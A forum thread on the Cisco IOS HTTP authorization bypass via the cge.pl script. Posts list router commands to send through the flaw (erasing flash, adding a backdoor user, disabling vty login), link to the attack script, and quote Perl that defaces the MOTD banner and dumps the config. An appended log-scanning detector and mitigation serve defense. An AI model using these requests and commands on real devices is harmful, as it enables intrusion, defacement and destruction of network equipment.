Fiend

Cisco IOS HTTP Auth Vulnerability

14 posts in this topic

I was messing around with Cisco exploits on Auditor and came across this one.

cge.pl -h 200.xxx.xxx.xxx -v 3

Vulnerability successful exploited with [http://200.xxx.xxx.xxx/level/17/exec/....] ...

([3] - Cisco IOS HTTP Auth Vulnerability)

It says it was successful, but what did it do? How does it work?

I don't understand and I can't find any information on the web. Supposedly you can send arbitrary commands to the Cisco router, but what commands?

0

arbitrary ones

0

show run

erase flash

enable password hax0red

username jabzor password goeshere

line vty 0 4

no login

priv 15

etc..? :P

0

yeah, but i think the question was "how" .. does one have to rewrite the code?

or does it work by the url so you just access "http://x.x.x.x/level/yy/exec/enable secure LoL" ??

0

Arbitrary command is set to actually execute something (in this case changing the MOTD) from the looks of the config? -_-

0

ah.. what ?

http://hacking.dotshell.net/tools/blackangels_cge.perl

if ($vuln == 1) {

print "\nEnter deface line : ";

$vuln = <STDIN>;

chomp($vuln);

exploit1("GET /level/$n/exec/-/configure/-/banner/motd/$vuln HTTP/1.0\n\n");

}

elsif ($vuln == 2) {

exploit1("GET /level/$n/exec/show%20conf HTTP/1.0\n\n");

print "$wrf";

}

banner message of the day, the message you get when you telnet/console in :)

0

ahm

i think we're not talkin about the same thing. the topic is about the cisco3 exploit.. your code is from cisco4 :)

0

i am aware, cisco 3 seems to be just for authentication bypass and shitall else..

letting you access a device you otherwise had no permission to

try accessing the url the script gives you

else {

sleep(2);

print "\nVulnerability successful exploited with [http://$serv/level/$n/exec/....] ...\n\n";

last LAB;

}

:wacko:

0

thanks, grand elite master.

but actually i'd LIKE to understand what's going on there.

0
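For anyone reviewing logs for this issue, an added example (not part of any post in this thread, and not code from cge.pl): IOS privilege levels run 0 to 15, so a request for /level/N/exec with N above 15, like the /level/17/exec/ URL the script printed, is the pattern to flag. The log layout, the addresses and the function name are assumptions, constructed for illustration.

```python
import re
from urllib.parse import unquote

# IOS privilege levels run 0-15, so a /level/N/exec request with N above 15
# (such as the /level/17/exec/ URL in the thread) is not a normal admin URL.
MAX_PRIV_LEVEL = 15

# Assumed log layout: Common Log Format written by a proxy or sensor in front
# of the router's HTTP server.
LINE = re.compile(r'^(?P<src>\S+) .*?"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})')
LEVEL_EXEC = re.compile(r'^/level/(?P<level>\d+)/exec(?:/(?P<cmd>.*))?$', re.IGNORECASE)

# Constructed sample lines (documentation addresses, invented timestamps).
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jan/2005:10:00:01 +0000] "GET /level/15/exec/-/show/version HTTP/1.0" 401 0
192.0.2.66 - - [01/Jan/2005:10:02:13 +0000] "GET /level/16/exec/ HTTP/1.0" 401 0
192.0.2.66 - - [01/Jan/2005:10:02:14 +0000] "GET /level/17/exec/ HTTP/1.0" 200 512
192.0.2.66 - - [01/Jan/2005:10:02:20 +0000] "GET /level/17/exec/show%20conf HTTP/1.0" 200 4096
192.0.2.10 - - [01/Jan/2005:10:05:00 +0000] "GET /index.html HTTP/1.0" 200 120
"""


def find_level_exec_hits(log_text):
    """Return one dict per request for /level/N/exec with N above 15."""
    hits = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue
        # Decode %xx escapes and drop any query string before matching.
        path = unquote(m["target"].split("?", 1)[0])
        lm = LEVEL_EXEC.match(path)
        if not lm or int(lm["level"]) <= MAX_PRIV_LEVEL:
            continue
        status = int(m["status"])
        hits.append({
            "src": m["src"],
            "level": int(lm["level"]),
            "command": lm["cmd"] or "",
            "status": status,
            # 200 means the device answered the request; anything else is a probe.
            "verdict": "served" if status == 200 else "probe",
        })
    return hits


if __name__ == "__main__":
    for hit in find_level_exec_hits(SAMPLE_LOG):
        print(hit)
```

On the router itself, `no ip http server` turns off the web interface these URLs are sent to.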
